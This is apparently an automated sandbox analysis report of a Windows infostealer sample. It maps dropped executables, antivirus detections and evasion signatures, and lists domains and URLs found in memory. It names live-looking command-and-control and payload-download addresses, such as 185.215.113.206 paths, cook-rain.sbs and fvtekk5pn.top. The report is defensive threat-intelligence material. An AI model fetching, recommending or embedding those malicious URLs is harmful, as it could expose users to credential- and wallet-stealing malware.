dropped file 40->171 173 Detected unpacking (changes PE section rights) 40->173 175 Tries to evade debugger and weak emulator (self modifying code) 40->175 177 4 other signatures 40->177 57 skotes.exe 40->57         started        113 www.google.com 142.250.184.228, 443, 49776, 49777 GOOGLEUS United States 48->113 115 plus.l.google.com 142.250.186.46, 443, 49802 GOOGLEUS United States 48->115 117 2 other IPs or domains 48->117 file14 signatures15 process16 dnsIp17 135 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 57->135 137 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 57->137 139 2 other IPs or domains 57->139 95 C:\Users\user\AppData\...\fb696bafb5.exe, PE32 57->95 dropped 97 C:\Users\user\AppData\...\846d486827.exe, PE32 57->97 dropped 99 C:\Users\user\AppData\...\241fdb96f6.exe, PE32 57->99 dropped 101 7 other malicious files 57->101 dropped 179 Multi AV Scanner detection for dropped file 57->179 181 Detected unpacking (changes PE section rights) 57->181 183 Creates multiple autostart registry keys 57->183 185 4 other signatures 57->185 62 fb696bafb5.exe 57->62         started        65 8eeb449c35.exe 57->65         started        68 241fdb96f6.exe 57->68         started        70 2 other processes 57->70 file18 signatures19 process20 dnsIp21 209 Multi AV Scanner detection for dropped file 62->209 211 Detected unpacking (changes PE section rights) 62->211 213 Modifies windows update settings 62->213 231 3 other signatures 62->231 123 cook-rain.sbs 188.114.96.3 CLOUDFLARENETUS European Union 65->123 215 Query firmware table information (likely to detect VMs) 65->215 217 Tries to evade debugger and weak emulator (self modifying code) 65->217 219 Tries to steal Crypto Currency Wallets 65->219 233 2 other signatures 65->233 221 Tries to detect sandboxes and other dynamic analysis tools (window names) 68->221 223 Hides threads from debuggers 68->223 225 Tries to detect sandboxes / dynamic malware analysis system (registry check) 68->225 125 fvtekk5pn.top 34.116.198.130 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 70->125 127 home.fvtekk5pn.top 70->127 227 Binary is likely a compiled AutoIt script file 70->227 229 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 70->229 72 chrome.exe 70->72         started        74 taskkill.exe 70->74         started        76 taskkill.exe 70->76         started        78 4 other processes 70->78 signatures22 process23 process24 80 chrome.exe 72->80         started        83 conhost.exe 74->83         started        85 conhost.exe 76->85         started        87 conhost.exe 78->87         started        89 conhost.exe 78->89         started        91 conhost.exe 78->91         started        dnsIp25 119 142.250.186.100 GOOGLEUS United States 80->119 121 www.google.com 80->121

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe39%ReversingLabsWin32.Trojan.Symmi
                      file.exe100%AviraTR/Crypt.TPM.Gen
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe34%ReversingLabsWin32.Trojan.AutoitInject
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe42%ReversingLabsWin32.Trojan.LummaStealer
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe39%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe53%ReversingLabsWin32.Trojan.LummaStealer
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe39%ReversingLabsWin32.Trojan.Symmi
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe32%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe32%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe42%ReversingLabsWin32.Trojan.LummaStealer
                      C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe39%ReversingLabsWin32.Trojan.Symmi
                      C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe34%ReversingLabsWin32.Trojan.AutoitInject
                      C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe39%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Trojan.LummaStealer
                      C:\Users\user\DocumentsKJEGCFBGDH.exe53%ReversingLabsWin32.Trojan.LummaStealer

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      example.org
                      		93.184.215.14
                      		truefalse
                        chrome.cloudflare-dns.com
                        		162.159.61.3
                        		truefalse
                          prod.classify-client.prod.webservices.mozgcp.net
                          		35.190.72.216
                          		truefalse
                            prod.balrog.prod.cloudops.mozgcp.net
                            		35.244.181.201
                            		truefalse
                              home.fvtekk5pn.top
                              		34.116.198.130
                              		truetrue
                                prod.detectportal.prod.cloudops.mozgcp.net
                                		34.107.221.82
                                		truefalse
                                  plus.l.google.com
                                  		142.250.186.46
                                  		truefalse
                                    cook-rain.sbs
                                    		188.114.96.3
                                    		truetrue
                                      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                      		94.245.104.56
                                      		truefalse
                                        s-part-0017.t-0009.t-msedge.net
                                        		13.107.246.45
                                        		truefalse
                                          sni1gl.wpc.nucdn.net
                                          		152.199.21.175
                                          		truefalse
                                            fvtekk5pn.top
                                            		34.116.198.130
                                            		truetrue
                                              contile.services.mozilla.com
                                              		34.117.188.166
                                              		truefalse
                                                youtube.com
                                                		142.250.186.142
                                                		truefalse
                                                  play.google.com
                                                  		172.217.18.14
                                                  		truefalse
                                                    ipv4only.arpa
                                                    		192.0.0.171
                                                    		truefalse
                                                      sb.scorecardresearch.com
                                                      		18.245.60.107
                                                      		truefalse
                                                        prod.ads.prod.webservices.mozgcp.net
                                                        		34.117.188.166
                                                        		truefalse
                                                          www.google.com
                                                          		142.250.184.228
                                                          		truefalse
                                                            js.monitor.azure.com
                                                            		unknown
                                                            		unknownfalse
                                                              assets.msn.com
                                                              		unknown
                                                              		unknownfalse
                                                                c.msn.com
                                                                		unknown
                                                                		unknownfalse
                                                                  spocs.getpocket.com
                                                                  		unknown
                                                                  		unknownfalse
                                                                    deff.nelreports.net
                                                                    		unknown
                                                                    		unknownfalse
                                                                      detectportal.firefox.com
                                                                      		unknown
                                                                      		unknownfalse
                                                                        ntp.msn.com
                                                                        		unknown
                                                                        		unknownfalse
                                                                          apis.google.com
                                                                          		unknown
                                                                          		unknownfalse
                                                                            api.msn.com
                                                                            		unknown
                                                                            		unknownfalse

                                                                              Contacted URLs

                                                                              NameMaliciousAntivirus DetectionReputation
                                                                              http://185.215.113.206/true
                                                                                http://185.215.113.206/68b591d6548ec281/nss3.dlltrue
                                                                                  185.215.113.206/c4becf79229cb002.phptrue
                                                                                    https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                                                                      https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0false
                                                                                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732096483637&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                                          http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347true
                                                                                            http://185.215.113.206/68b591d6548ec281/vcruntime140.dlltrue
                                                                                              http://185.215.113.206/68b591d6548ec281/sqlite3.dlltrue

                                                                                                URLs from Memory and Binaries

                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                https://www.openh264.org//firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpfalse
                                                                                                  https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsLisfirefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_lfirefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecyclfirefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsfirefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                https://merino.services.mozilla.com/api/v1/suggestfirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  http://185.215.113.206/5m241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://www.leboncoin.fr/firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      http://185.215.113.206/ws241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://spocs.getpocket.com/spocsfirefox.exe, 0000002B.00000002.3254494397.000002376C82C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          https://ebay.comfirefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpfalse
                                                                                                                            https://screenshots.firefox.comfirefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              https://completion.amazon.com/search/complete?q=firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://ads.stickyadstv.com/firefox-etpfirefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3220663743.00000237692A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  https://github.com/w3c/csswg-drafts/issues/4650firefox.exe, 0000002B.00000002.3259915255.0000023770C33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    https://gpuweb.github.io/gpuweb/validate/chromeModifiersfirefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmfirefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpfalse
                                                                                                                                        https://www.amazon.com/exec/obidos/external-search/firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://www.msn.comfirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3267074024.000008519BB41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://getpocket.com/recommendationsTOP_SITES_CLOSE_SEARCH_SHORTCUTS_MODALTOP_SITES_OPEN_SEARCH_SHOfirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/JSONFile.sys.mjsresource://gre/modulesfirefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://github.com/mozilla-services/screenshotsfirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  http://exslt.org/setsfirefox.exe, 0000002B.00000002.3164927183.0000023763D26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://youtube.com/firefox.exe, 0000002B.00000002.3245686886.000002376C292000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3122002241.000002376C878000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3232432878.000002376AB03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      https://firefox.settings.services.mozilla.com/v1resource://gre/modules/AddonManager.jsmfirefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://cook-rain.sbs/668eeb449c35.exe, 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://spocs.getpocket.com/userAS_ROUTER_TELEMETRY_USER_EVENTDISCOVERY_STREAM_FEED_UPDATEDISCOVERY_firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://www.amazon.com/exec/obidos/external-search/moz-extension://9eeed604-9883-4846-a688-8a355e52efirefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              http://microsoft.co8eeb449c35.exe, 00000021.00000003.3277455938.000000000117F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                http://exslt.org/commonfirefox.exe, 0000002B.00000002.3164927183.0000023763D26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifirefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://ok.ru/firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.amazon.com/firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://fpn.firefox.comfirefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268410463.000023F90CF04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.widevine.com/firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://www.google.com/policies/privacy/2firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpfalse
                                                                                                                                                                                http://exslt.org/dates-and-timesfirefox.exe, 0000002B.00000002.3164927183.0000023763D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://ocsp.rootca1.amazontrust.com0:8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmoz-efirefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://getpocket.com/firefox/new_tab_learn_moresetupPrefs/hideDescriptionsRegionsfirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://spocs.getpocket.com/userAS_ROUTER_TELEMETRY_USER_EVENTfirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesfirefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://win.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://ace-snapper-privately.ngrok-free.app/test/testFailed824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://www.youtube.com/firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://cook-rain.sbs/apigs8eeb449c35.exe, 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmrfirefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpfalse
                                                                                                                                                                                                        https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://127.0.0.1:firefox.exe, 0000002B.00000002.3200192387.0000023768585000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://merino.services.mozilla.com/api/v1/suggest5firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpfalse
                                                                                                                                                                                                              https://bugzilla.mofirefox.exe, 0000002B.00000002.3229545738.000002376A803000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://cook-rain.sbs:443/api8eeb449c35.exefalse
                                                                                                                                                                                                                  http://185.215.113.206/68b591d6548ec281/msvcp140.dllZfile.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://amazon.comfirefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 0000002B.00000002.3222383416.000002376930C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3220663743.00000237692A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://screenshots.firefox.com/FORCE_PRIVATE_BROWSING_WINDOWresource://default-theme/wikipediafirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Somehowfirefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_kefirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              http://185.215.113.16/mine/random.exetfile.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://msn.comXIDv108eeb449c35.exe, 00000019.00000003.2895853404.0000000005315000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2897117382.0000000005304000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2896993174.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3073543559.0000000005A7E000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3076025417.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3081033783.0000000005A64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://185.215.113.16/off/def.exe8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://spocs.getpocket.com/firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      http://www.inbox.lv/rfc2368/?value=%sresource://gre/modules/DeferredTask.sys.mjsSchemefirefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        https://ebay.comPfirefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          https://www.iqiyi.com/firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://www.tsn.ca=firefox.exe, 0000002B.00000002.3267074024.000008519BB41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              http://html4/loose.dtd824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://cook-rain.sbs:443/apiLocal8eeb449c35.exe, 00000019.00000003.3014614816.000000000530E000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2911664877.000000000530F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  https://support.mozilla.org/kb/website-translationresource://gre/modules/PrivateBrowsingUtils.sys.mjfirefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://bugzilla.mozilla.org/show_bug.cgi?id=1584464firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      https://cook-rain.sbs/D8eeb449c35.exe, 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        http://185.215.113.16/W8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          https://cook-rain.sbs/B8eeb449c35.exe, 00000021.00000003.3056107294.00000000011FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            http://185.215.113.16/Y8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              https://yandex.comfirefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                https://static.adsafeprotected.com/firefox-etp-pixelCannotfirefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse
